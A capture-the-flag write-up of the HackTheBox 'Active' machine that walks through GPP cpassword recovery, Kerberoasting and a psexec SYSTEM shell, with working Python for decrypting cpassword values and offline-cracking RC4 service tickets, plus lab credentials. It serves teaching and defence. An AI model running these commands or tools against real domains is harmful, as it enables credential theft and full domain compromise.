Active (HTB)

HackTheBox Active Write-Up

topics: Active Directory, Windows Privilege Escalation, Kerberoasting, Abusing Group Policy Preferences

  1. Enumeration

  2. Administrator Privilege Escalation

tools: nmap, autorecon, smbclient, smbget, gpp-decrypt, GetUserSPNs, psexec

Enumeration

Initial nmap and autorecon scans:

The initial scans show what looks like an Active Directory domain controller: DNS, Kerberos, LDAP, MSRPC and SMB are all open.

While the scans complete their full enumeration, we can glance over some preliminary information.

SMB (Anonymous)

The autorecon smbclient and smbget output reported that anonymous login was not permitted; however, the enum4linux scan lists two non-default shares: Replication and Users.

The Users share refuses anonymous access, but Replication allows it. Establishing an anonymous SMB session and listing the contents reveals a copy of the domain's Group Policy files, including the Group Policy Preferences (GPP) XML files for the AD environment.

Abusing GPP

Using the anonymous session, we can recursively download every file on the Replication share.

At first glance of the smbget results, Groups.xml and Registry.pol stand out as the only files of interest.

In a CTF, unusual files or processes usually mark the intended attack vector, and searching for "AD groups.xml exploit" points us to this article, which explains how to look for an encrypted password stored in the XML file's cpassword attribute.

Checking Groups.xml confirms a cpassword value for the account svc_tgs (a service account named after the ticket-granting service).

With the cpassword retrieved, we can decrypt it with gpp-decrypt <cpassword>. The value is AES-256 encrypted under a key that Microsoft itself published in its GPP documentation, which is why any domain user who can read SYSVOL can recover it.
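What gpp-decrypt does under the hood, as an added example that is not part of the original write-up: Group Policy Preferences encrypt cpassword with AES-256-CBC under the published key, an all-zero IV and PKCS#7 padding, with the plaintext in UTF-16LE, and then base64-encode it with the trailing '=' characters stripped. The Python below parses a Groups.xml, pulls every cpassword and decrypts it. The sample Groups.xml is constructed here (trimmed, without the clsid/uid attributes a real file carries) and its cpassword is generated locally by the included encoder from the write-up's own svc_tgs credential, not copied from the box; the AES primitive comes from the cryptography package, with pycryptodome as a fallback, and one of the two is assumed to be installed.

```python
import base64
import xml.etree.ElementTree as ET

# AES-256 key Microsoft published in the GPP documentation (the reason MS14-025
# removed the ability to store passwords in preferences). A constant, not a secret.
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)
GPP_IV = bytes(16)  # CBC with an all-zero IV


def _aes_cbc(data: bytes, encrypt: bool) -> bytes:
    """Raw AES-256-CBC under the fixed GPP key; padding is handled by the callers.
    Uses the cryptography package, falling back to pycryptodome (assumed installed)."""
    try:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        ctx = Cipher(algorithms.AES(GPP_AES_KEY), modes.CBC(GPP_IV))
        op = ctx.encryptor() if encrypt else ctx.decryptor()
        return op.update(data) + op.finalize()
    except ImportError:
        from Crypto.Cipher import AES
        cipher = AES.new(GPP_AES_KEY, AES.MODE_CBC, iv=GPP_IV)
        return cipher.encrypt(data) if encrypt else cipher.decrypt(data)


def decrypt_cpassword(cpassword: str) -> str:
    """Reverse the cpassword encoding: base64 (padding stripped) -> AES-CBC -> UTF-16LE."""
    padded = cpassword + "=" * (-len(cpassword) % 4)  # Groups.xml drops the '=' characters
    raw = _aes_cbc(base64.b64decode(padded), encrypt=False)
    pad_len = raw[-1]
    if not 1 <= pad_len <= 16 or raw[-pad_len:] != bytes([pad_len]) * pad_len:
        raise ValueError("bad PKCS#7 padding: not a GPP cpassword, or corrupted")
    return raw[:-pad_len].decode("utf-16-le")


def encode_cpassword(password: str) -> str:
    """Forward direction (what the GPP editor did); used here only to build sample data."""
    plain = password.encode("utf-16-le")
    pad_len = 16 - len(plain) % 16
    ciphertext = _aes_cbc(plain + bytes([pad_len]) * pad_len, encrypt=True)
    return base64.b64encode(ciphertext).decode().rstrip("=")


def find_gpp_credentials(xml_text: str) -> list:
    """Return (account, cleartext) for every <Properties> element carrying a cpassword.
    Groups.xml names the account in userName; ScheduledTasks.xml uses runAs and
    Services.xml accountName, so the same parser covers the other GPP files too."""
    found = []
    for props in ET.fromstring(xml_text).iter("Properties"):
        cpw = props.get("cpassword")
        if cpw:
            account = props.get("userName") or props.get("runAs") or props.get("accountName")
            found.append((account, decrypt_cpassword(cpw)))
    return found


def build_sample_groups_xml() -> str:
    """Constructed, trimmed Groups.xml. The cpassword is generated locally from the
    write-up's svc_tgs credential, not the ciphertext taken from the box."""
    cpw = encode_cpassword("GPPstillStandingStrong2k18")
    return (
        '<?xml version="1.0" encoding="utf-8"?>\n'
        "<Groups>\n"
        '  <User name="active.htb\\svc_tgs">\n'
        f'    <Properties action="U" cpassword="{cpw}" userName="active.htb\\svc_tgs"/>\n'
        "  </User>\n"
        "</Groups>\n"
    )


if __name__ == "__main__":
    for account, password in find_gpp_credentials(build_sample_groups_xml()):
        print(f"{account}:{password}")
```

Point the parser at the real files by reading them from the downloaded share (the Policies subtree, and in particular any Groups.xml, ScheduledTasks.xml or Services.xml under Preferences) instead of build_sample_groups_xml(); the padding check catches a value that was not produced with the GPP key, which is the usual sign of a truncated copy-paste.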

Now that we have the verified credentials svc_tgs:GPPstillStandingStrong2k18 we can attempt to enumerate SMB using valid authentication.

SMB (credentialed)

Enumerating the Users share that previously denied us now succeeds and exposes a copy of the system's C:\Users folder. This gives us user.txt, but on its own it is not enough to turn into an interactive foothold on the host.

Administrator Privilege Escalation

In Active Directory, a single set of valid domain credentials opens up a number of attack vectors; as the box hints, the most likely one here is Kerberoasting: any authenticated domain user can request a service ticket for any account that has an SPN, and that ticket is encrypted with a key derived from the service account's password, so it can be cracked offline.

Kerberoasting

We can run impacket-GetUserSPNs to list the accounts with SPNs and request a service ticket (TGS) for each of them, then crack the ticket offline with john to recover the service account's password.

impacket-GetUserSPNs active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip <targetIP> -request

Cracking the hash with john and the rockyou wordlist returns the password Ticketmaster1968. The SPN belongs to the Administrator account, so this gives us an interactive SYSTEM-level shell on the target via impacket-psexec with Administrator credentials:

impacket-psexec active.htb/Administrator:Ticketmaster1968@<targetIP>
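Why the captured ticket can be cracked offline, as an added example that is not from the original write-up: the enc-part of a service ticket uses RC4-HMAC (etype 23) keyed by the service account's NT hash (MD4 of the UTF-16LE password), so a cracker derives the NT hash of each candidate, decrypts the ticket and checks the HMAC-MD5 checksum the KDC embedded. The Python below implements that check the way john and hashcat (mode 13100) treat a $krb5tgs$23$ line; MD4 and RC4 are written out because hashlib usually lacks MD4 on OpenSSL 3. The ticket it cracks is constructed locally under the password the write-up recovers (Ticketmaster1968); the SPN string, the ticket body and the wordlist are placeholders, not data captured from the box.

```python
import hashlib
import hmac
import os
import struct

KEY_USAGE_TGS_REP_TICKET = 2  # RFC 4120 7.5.1: service-ticket enc-part, keyed by the service account

_MD4_K2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
_MD4_K3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)


def _rotl32(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320, written out because hashlib.new('md4') is usually unavailable on OpenSSL 3."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for r in range(48):
            if r < 16:    # round 1: F, message words in order, no constant
                f, k, s = (b & c) | (~b & d), r, (3, 7, 11, 19)[r % 4]
            elif r < 32:  # round 2: G (majority) + sqrt(2) constant
                f, k, s = (b & c) | (b & d) | (c & d), _MD4_K2[r - 16], (3, 5, 9, 13)[r % 4]
                f += 0x5A827999
            else:         # round 3: H (xor) + sqrt(3) constant
                f, k, s = b ^ c ^ d, _MD4_K3[r - 32], (3, 9, 11, 15)[r % 4]
                f += 0x6ED9EBA1
            a, b, c, d = d, _rotl32((a + f + X[k]) & 0xFFFFFFFF, s), b, c
        a, b, c, d = [(x + y) & 0xFFFFFFFF for x, y in ((a, aa), (b, bb), (c, cc), (d, dd))]
    return struct.pack("<4I", a, b, c, d)


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def nt_hash(password: str) -> bytes:
    """The NT hash is MD4 over the UTF-16LE password; it is also the RC4-HMAC Kerberos key."""
    return md4(password.encode("utf-16-le"))


def _hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes) -> bytes:
    """RFC 4757 encryption (what the KDC does): checksum || RC4(K3, confounder || plaintext)."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    body = confounder + plaintext
    checksum = _hmac_md5(k1, body)
    return checksum + rc4(_hmac_md5(k1, checksum), body)


def rc4_hmac_verify(key: bytes, usage: int, edata: bytes) -> bool:
    """The cracker's test: decrypt under the candidate key and recompute the checksum."""
    checksum, body = edata[:16], edata[16:]
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    plaintext = rc4(_hmac_md5(k1, checksum), body)
    return hmac.compare_digest(_hmac_md5(k1, plaintext), checksum)


def format_krb5tgs(user: str, realm: str, spn: str, edata: bytes) -> str:
    """john/hashcat (mode 13100) line layout, as impacket GetUserSPNs prints it."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${edata[:16].hex()}${edata[16:].hex()}"


def crack_krb5tgs(hash_line: str, wordlist):
    """Offline attack: derive each candidate's NT hash and test it against the ticket."""
    if not hash_line.startswith("$krb5tgs$23$"):
        raise ValueError("only etype 23 (RC4-HMAC) tickets are handled here")
    checksum_hex, body_hex = hash_line.rsplit("$", 2)[1:]
    edata = bytes.fromhex(checksum_hex + body_hex)
    for candidate in wordlist:
        if rc4_hmac_verify(nt_hash(candidate), KEY_USAGE_TGS_REP_TICKET, edata):
            return candidate
    return None


def build_sample_hash() -> str:
    """Constructed ticket (not the one captured from the box): the service account key is
    the NT hash of the password the write-up cracks; the SPN and body are placeholders."""
    enc_ticket_part = b"placeholder EncTicketPart body (a real ticket carries DER-encoded ASN.1)"
    edata = rc4_hmac_encrypt(nt_hash("Ticketmaster1968"), KEY_USAGE_TGS_REP_TICKET,
                             enc_ticket_part, os.urandom(8))  # 8-byte random confounder
    return format_krb5tgs("Administrator", "ACTIVE.HTB", "cifs/dc.active.htb", edata)


if __name__ == "__main__":
    print(crack_krb5tgs(build_sample_hash(), ["password", "Summer2018!", "Ticketmaster1968"]))
```

The KDC never sees the cracking happen: every candidate test is one MD4 and three HMAC-MD5 calls on the attacker's machine, which is why a service account with an SPN needs a long random password (or a group managed service account) rather than relying on lockout policy. AES tickets (etype 17/18) cost far more per guess because of PBKDF2 key derivation, so forcing AES on SPN accounts also blunts the attack.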
